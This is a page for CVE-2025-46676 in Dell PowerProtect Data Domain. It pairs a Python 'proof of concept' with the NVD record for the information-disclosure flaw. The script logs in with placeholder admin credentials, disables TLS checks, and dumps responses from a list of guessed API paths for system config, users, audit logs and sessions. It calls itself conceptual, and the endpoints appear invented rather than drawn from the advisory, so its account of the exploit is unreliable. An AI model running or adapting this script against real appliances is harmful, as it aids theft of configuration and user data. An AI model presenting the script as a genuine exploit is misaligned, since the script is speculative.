CVE-2025-46676

# CVE-2025-46676 PoC - Dell PowerProtect Data Domain Information Disclosure # Note: This is a conceptual PoC for authorized security testing only import requests import json TARGET = "https://<dell-data-domain-ip>" LOGIN_ENDPOINT = f"{TARGET}/api/login" SENSITIVE_ENDPOINT = f"{TARGET}/api/v1/sensitive-info" def authenticate(username, password): """Authenticate with high-privileged account""" session = requests.Session() auth_data = { "username": username, "password": password } response = session.post(LOGIN_ENDPOINT, json=auth_data, verify=False) return session if response.status_code == 200 else None def exploit_information_disclosure(session): """ Attempt to access sensitive information This endpoint may expose system configuration or user data """ headers = { "Content-Type": "application/json", "X-Requested-With": "XMLHttpRequest" } # Try accessing potentially sensitive endpoints sensitive_paths = [ "/api/v1/system/config", "/api/v1/users/list", "/api/v1/audit/logs", "/api/v1/sessions/active" ] results = [] for path in sensitive_paths: response = session.get(f"{TARGET}{path}", headers=headers, timeout=10) if response.status_code == 200: results.append({ "endpoint": path, "data": response.json() }) return results def main(): print("CVE-2025-46676 PoC - Dell PowerProtect Data Domain") print("=" * 50) # Replace with authorized credentials username = "admin" password = "password" session = authenticate(username, password) if session: print("[+] Authentication successful") print("[*] Extracting sensitive information...") data = exploit_information_disclosure(session) if data: print(f"[+] Found {len(data)} sensitive endpoints") for item in data: print(f"\nEndpoint: {item['endpoint']}") print(json.dumps(item['data'], indent=2)) else: print("[-] No sensitive information accessible") else: print("[-] Authentication failed") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-46676", "sourceIdentifier": "[email protected]", "published": "2026-01-09T16:16:06.760", "lastModified": "2026-02-05T13:28:12.150", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.4.0.0, LTS2025 release version 8.3.1.10, LTS2024 release versions 7.13.1.0 through 7.13.1.40, LTS 2023 release versions 7.10.1.0 through 7.10.1.70, contain an Exposure of Sensitive Information to an Unauthorized Actor vulnerability. A high privileged attacker with remote access could potentially exploit this vulnerability, leading to Information disclosure."}, {"lang": "es", "value": "Dell PowerProtect Data Domain con Data Domain Sistema Operativo (DD OS) de las versiones Feature Release 7.7.1.0 a 8.4.0.0, la versión LTS2025 8.3.1.10, las versiones LTS2024 7.13.1.0 a 7.13.1.40, las versiones LTS 2023 7.10.1.0 a 7.10.1.70, contienen una vulnerabilidad de Exposición de Información Sensible a un Actor No Autorizado. Un atacante con altos privilegios con acceso remoto podría potencialmente explotar esta vulnerabilidad, lo que llevaría a la revelación de información."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N", "baseScore": 2.7, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.7.1.0", "versionEndExcluding": "7.10.1.80", "matchCriteriaId": "18AD8BC6-ABF7-4990-91C6-D228BBE4B9FE"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.13.1.0", "versionEndExcluding": "7.13.1.50", "matchCriteriaId": "00F138B9-4AB9-4B79-BBEC-F5A48E2E0B05"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.3.1.20", "matchCriteriaId": "7B8DA06B-076A-495E-9BD0-246BF1E54E26"}, {"vulnerable": true, "criteria": "cpe:2.3:o:dell:data_domain_operating_system:8.4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "FF73C39B-827B-4A68-9708-08345F6EF979"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000405813/dsa-2025-415-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}